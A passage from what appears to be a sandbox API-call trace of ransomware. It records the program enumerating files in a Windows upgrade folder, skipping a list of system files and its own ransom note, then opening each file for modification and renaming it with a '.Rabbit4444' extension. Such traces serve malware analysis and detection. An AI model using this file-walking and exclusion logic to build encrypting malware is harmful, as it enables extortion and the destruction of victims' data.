Size=0x6c) returned 0x117680 [0046.400] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0046.400] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1160, lpName=0x0) returned 0x298 [0046.401] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1160) returned 0x70000 [0046.402] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0046.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.403] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0046.403] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13771372312) returned 1 [0046.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0046.403] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0046.403] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.403] CloseHandle (hObject=0x298) returned 1 [0046.403] CloseHandle (hObject=0x278) returned 1 [0046.404] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\lock.png.Rabbit4444") returned 52 [0046.405] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\lock.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\lock.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.405] InterlockedExchangeAdd (in: Addend=0xff618, Value=3680 | out: Addend=0xff618) returned 4283312 [0046.405] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2626 [0046.405] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xa33, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="Rabbit4444.exe") returned -1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2=".") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="..") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="windows") returned -1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="bootmgr") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="pagefile.sys") returned -1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="boot") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="ids.txt") returned 1 [0046.405] lstrcmpiW (lpString1="logo.png", lpString2="NTUSER.DAT") returned -1 [0046.405] lstrcpyW (in: lpString1=0x130eb7a, lpString2="logo.png" | out: lpString1="logo.png") returned="logo.png" [0046.405] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png", dwFileAttributes=0x0) returned 1 [0046.406] lstrlenW (lpString="logo.png") returned 8 [0046.406] lstrlenW (lpString="Rabbit4444") returned 10 [0046.406] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0046.406] lstrlenW (lpString=".dll") returned 4 [0046.406] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.406] lstrlenW (lpString=".lnk") returned 4 [0046.406] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.406] lstrlenW (lpString=".ini") returned 4 [0046.406] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.406] lstrlenW (lpString=".sys") returned 4 [0046.406] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.406] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.406] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.406] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13771698243) returned 1 [0046.406] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2611) returned 1 [0046.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0046.406] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0046.406] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd40, lpName=0x0) returned 0x298 [0046.407] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd40) returned 0x70000 [0046.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0046.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.409] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0046.409] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13771998150) returned 1 [0046.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0046.409] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101f30 | out: hHeap=0xe0000) returned 1 [0046.409] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.409] CloseHandle (hObject=0x298) returned 1 [0046.410] CloseHandle (hObject=0x278) returned 1 [0046.411] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\logo.png.Rabbit4444") returned 52 [0046.411] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\logo.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\logo.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.411] InterlockedExchangeAdd (in: Addend=0xff618, Value=2624 | out: Addend=0xff618) returned 4286992 [0046.411] InterlockedExchangeAdd (in: Addend=0xff624, Value=2 | out: Addend=0xff624) returned 2629 [0046.411] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x1ed, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="marketing.png", cAlternateFileName="MARKET~1.PNG")) returned 1 [0046.411] lstrcmpiW (lpString1="marketing.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.411] lstrcmpiW (lpString1="marketing.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.411] lstrcmpiW (lpString1="marketing.png", lpString2="Rabbit4444.exe") returned -1 [0046.411] lstrcmpiW (lpString1="marketing.png", lpString2=".") returned 1 [0046.411] lstrcmpiW (lpString1="marketing.png", lpString2="..") returned 1 [0046.412] lstrcmpiW (lpString1="marketing.png", lpString2="windows") returned -1 [0046.412] lstrcmpiW (lpString1="marketing.png", lpString2="bootmgr") returned 1 [0046.412] lstrcmpiW (lpString1="marketing.png", lpString2="pagefile.sys") returned -1 [0046.412] lstrcmpiW (lpString1="marketing.png", lpString2="boot") returned 1 [0046.412] lstrcmpiW (lpString1="marketing.png", lpString2="ids.txt") returned 1 [0046.412] lstrcmpiW (lpString1="marketing.png", lpString2="NTUSER.DAT") returned -1 [0046.412] lstrcpyW (in: lpString1=0x130eb7a, lpString2="marketing.png" | out: lpString1="marketing.png") returned="marketing.png" [0046.412] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png", dwFileAttributes=0x0) returned 1 [0046.412] lstrlenW (lpString="marketing.png") returned 13 [0046.412] lstrlenW (lpString="Rabbit4444") returned 10 [0046.412] lstrcmpiW (lpString1="keting.png", lpString2="Rabbit4444") returned -1 [0046.412] lstrlenW (lpString=".dll") returned 4 [0046.412] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.412] lstrlenW (lpString=".lnk") returned 4 [0046.412] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.412] lstrlenW (lpString=".ini") returned 4 [0046.412] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.412] lstrlenW (lpString=".sys") returned 4 [0046.412] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.412] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.412] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.412] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13772323863) returned 1 [0046.413] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=493) returned 1 [0046.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c20 [0046.413] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d98 [0046.413] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4f0, lpName=0x0) returned 0x298 [0046.415] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4f0) returned 0x70000 [0046.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0046.415] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0046.415] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0046.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0046.416] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13772654048) returned 1 [0046.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c20 | out: hHeap=0xe0000) returned 1 [0046.416] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0046.416] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.416] CloseHandle (hObject=0x298) returned 1 [0046.416] CloseHandle (hObject=0x278) returned 1 [0046.418] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\marketing.png.Rabbit4444") returned 57 [0046.418] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\marketing.png.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\marketing.png.rabbit4444"), dwFlags=0x1) returned 1 [0046.418] InterlockedExchangeAdd (in: Addend=0xff618, Value=496 | out: Addend=0xff618) returned 4289616 [0046.418] InterlockedExchangeAdd (in: Addend=0xff624, Value=3 | out: Addend=0xff624) returned 2631 [0046.418] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xea60a72c, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea60a72c, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xea60a72c, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.WinJS", cAlternateFileName="MICROS~1.WIN")) returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="Rabbit4444.exe") returned -1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2=".") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="..") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="windows") returned -1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="bootmgr") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="pagefile.sys") returned -1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="boot") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="ids.txt") returned 1 [0046.418] lstrcmpiW (lpString1="Microsoft.WinJS", lpString2="NTUSER.DAT") returned -1 [0046.418] lstrcpyW (in: lpString1=0x130eb7a, lpString2="Microsoft.WinJS" | out: lpString1="Microsoft.WinJS") returned="Microsoft.WinJS" [0046.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6368 [0046.419] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x62) returned 0xf1448 [0046.419] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6370 | out: ListHead=0xf68b0, ListEntry=0xf6370) returned 0xf6350 [0046.419] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea627c0d, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea627c0d, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x97e0d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetworkIssueFAQ.mht", cAlternateFileName="NETWOR~1.MHT")) returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="Rabbit4444.exe") returned -1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2=".") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="..") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="windows") returned -1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="bootmgr") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="pagefile.sys") returned -1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="boot") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="ids.txt") returned 1 [0046.419] lstrcmpiW (lpString1="NetworkIssueFAQ.mht", lpString2="NTUSER.DAT") returned -1 [0046.419] lstrcpyW (in: lpString1=0x130eb7a, lpString2="NetworkIssueFAQ.mht" | out: lpString1="NetworkIssueFAQ.mht") returned="NetworkIssueFAQ.mht" [0046.419] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht", dwFileAttributes=0x0) returned 1 [0046.420] lstrlenW (lpString="NetworkIssueFAQ.mht") returned 19 [0046.420] lstrlenW (lpString="Rabbit4444") returned 10 [0046.420] lstrcmpiW (lpString1="sueFAQ.mht", lpString2="Rabbit4444") returned 1 [0046.420] lstrlenW (lpString=".dll") returned 4 [0046.420] lstrcmpiW (lpString1=".mht", lpString2=".dll") returned 1 [0046.420] lstrlenW (lpString=".lnk") returned 4 [0046.420] lstrcmpiW (lpString1=".mht", lpString2=".lnk") returned 1 [0046.420] lstrlenW (lpString=".ini") returned 4 [0046.420] lstrcmpiW (lpString1=".mht", lpString2=".ini") returned 1 [0046.420] lstrlenW (lpString=".sys") returned 4 [0046.420] lstrcmpiW (lpString1=".mht", lpString2=".sys") returned -1 [0046.420] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.420] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.420] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13773113554) returned 1 [0046.420] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=622093) returned 1 [0046.420] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0046.421] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0046.421] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x98110, lpName=0x0) returned 0x298 [0046.422] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x98110) returned 0x1310000 [0046.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0046.438] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0046.438] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0046.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0046.439] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13774940867) returned 1 [0046.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0046.439] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0046.439] UnmapViewOfFile (lpBaseAddress=0x1310000) returned 1 [0046.444] CloseHandle (hObject=0x298) returned 1 [0046.444] CloseHandle (hObject=0x278) returned 1 [0046.458] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.Rabbit4444") returned 63 [0046.458] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\NetworkIssueFAQ.mht.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\networkissuefaq.mht.rabbit4444"), dwFlags=0x1) returned 1 [0046.458] InterlockedExchangeAdd (in: Addend=0xff618, Value=622096 | out: Addend=0xff618) returned 4290112 [0046.458] InterlockedExchangeAdd (in: Addend=0xff624, Value=18 | out: Addend=0xff624) returned 2634 [0046.458] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea631830, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea631830, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x875, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoNetworkConnection.png", cAlternateFileName="NONETW~1.PNG")) returned 1 [0046.458] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0046.458] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0046.458] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="Rabbit4444.exe") returned -1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2=".") returned 1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="..") returned 1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="windows") returned -1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="bootmgr") returned 1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="pagefile.sys") returned -1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="boot") returned 1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="ids.txt") returned 1 [0046.459] lstrcmpiW (lpString1="NoNetworkConnection.png", lpString2="NTUSER.DAT") returned -1 [0046.459] lstrcpyW (in: lpString1=0x130eb7a, lpString2="NoNetworkConnection.png" | out: lpString1="NoNetworkConnection.png") returned="NoNetworkConnection.png" [0046.459] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png", dwFileAttributes=0x0) returned 1 [0046.459] lstrlenW (lpString="NoNetworkConnection.png") returned 23 [0046.459] lstrlenW (lpString="Rabbit4444") returned 10 [0046.459] lstrcmpiW (lpString1="ection.png", lpString2="Rabbit4444") returned -1 [0046.459] lstrlenW (lpString=".dll") returned 4 [0046.459] lstrcmpiW (lpString1=".png", lpString2=".dll") returned 1 [0046.459] lstrlenW (lpString=".lnk") returned 4 [0046.459] lstrcmpiW (lpString1=".png", lpString2=".lnk") returned 1 [0046.459] lstrlenW (lpString=".ini") returned 4 [0046.459] lstrcmpiW (lpString1=".png", lpString2=".ini") returned 1 [0046.459] lstrlenW (lpString=".sys") returned 4 [0046.459] lstrcmpiW (lpString1=".png", lpString2=".sys") returned -1 [0046.459] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\NoNetworkConnection.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\nonetworkconnection.png"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0046.460] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0046.460] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13777030677) returned 1 [0046.460] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=2165) returned 1 [0046.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0046.460] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0046.460] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb80, lpName=0x0) returned 0x298 [0046.461] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb80) returned 0x70000 [0046.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0046.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0046.462] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0046.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0046.462] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0046.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0046.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0046.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0046.463] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13777347037) returned 1 [0046.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0046.463] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d10 | out: hHeap=0xe0000) returned 1 [0046.463] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0046.463] CloseHandle (hObject=0x298) returned 1 [0046.463] CloseHandle (hObject=0x278) returned 1 [0046.464] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: 